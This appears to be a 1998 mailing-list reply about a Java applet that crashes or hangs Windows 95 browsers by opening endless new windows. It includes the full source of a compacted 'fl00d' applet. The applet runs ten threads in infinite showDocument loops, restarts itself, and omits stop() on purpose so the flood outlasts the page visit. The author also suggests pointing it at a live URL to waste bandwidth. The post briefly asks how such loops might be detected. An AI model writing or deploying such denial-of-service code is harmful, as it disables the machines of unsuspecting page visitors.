Re: Java reboots win95 (or any java-enabled browser)

qu'evin (kevin.v@ODYSSEY.ON.CA)
Sat, 17 Jan 1998 18:31:07 -0500

>(If this is known stuff, i appologize)
>
>I have successfully been able to reboot several win95 machines
>with a simple java applet. All the applet does is to try and load
>new browsers with the showDocument(url, target) function. When
>trying this on IE3 i only needed one loop with showDocument to
>make everything freeze, with 10 threads all doing the same thing
>my computer immediately rebooted after initializing the applets.
>In IE4 and Netscape you need more threads, and i also used a
>web page with more applets running at the same time.
>They have the same effect though, it either hangs or reboots.

this type of attack has been known since the creation of java. it is
possible to do it any other language(javascript, activex, etc) that allows
you to open new windows or eat-up system resources quickly (and repeatedly)

>I have only tried this with relatively slow computers, but my guess
>is that if you add more threads to each applet or more applets to
>each webpage more powerful computers will be effected too (if they
>aren't already).

although thats true, it isnt necessarily the best approach. keep in mind
that for each new thread creation, it takes time. the more threads it must
create/initialize, the longer period before it starts opening new windows,
and when it does if its still making threads, even longer and slower. so,
ive gone with 10 threads (it performs best on my p-mmx166 32megram
NT4wstn). ive also made the code much more compact (compiles to 1k as
opposed to the 10k original). also note that theres no stop() (which is
called when the browser leaves the page), so the threads should continue to
run even if they leave. another thing i questioned, why not provide a
working URL so that it not only eats resources, but also eats bandwidth?
it didnt let it run long enough to crash my machine, but CPU usage goes
immediately to 100% and stays until 'end tasking' netscape ... anyone wanna
try on different machine speeds/browsers?

this is just one of many possible bugs in languages like java. despite
them running in a 'sandbox', they can still do this. the jre1.2 is suppose
to include improved security managers, but are they going to be able to
catch DoS loops like this? what would the theory be behind creating some
sort of scan that checks for potential DoS's like this?

and finally, the new code... of course, use at your own risk, and use
responsibly.
----
// fl00d.class - floods your machine with browsers and eventually
// hangs it. Code written by Joe Lindström.
//
// modifications done by Kevin Venkiteswaran (to make class smaller,
// general code improvement). ive made it so that it runs an infinite
// loop trying to get the new URL and there is NO stop(), so that if
// it doesnt crash the machine, resources will be at next to 0,
// until they close the browser

import java.applet.Applet;
import java.net.URL;
import java.net.MalformedURLException;

public class fl00d extends Applet implements Runnable {
static URL address = null;

public void init() {
System.err.println("fl00d class v1.1");
}

public void start() {
try {
address = new URL("http://fl00d.fl00d.fl00d");
} catch(MalformedURLException e) {}
for (int i = 0; i < 10; i++) {
new Thread(this).start();
}
// while (true) {
// getAppletContext().showDocument(address, "_blank");
// }
try {
Thread.currentThread().sleep(20000);
} catch (InterruptedException e) {;}

this.start();
}

public void run() {
while (true) {
getAppletContext().showDocument(address, "_blank");
}
}
}
----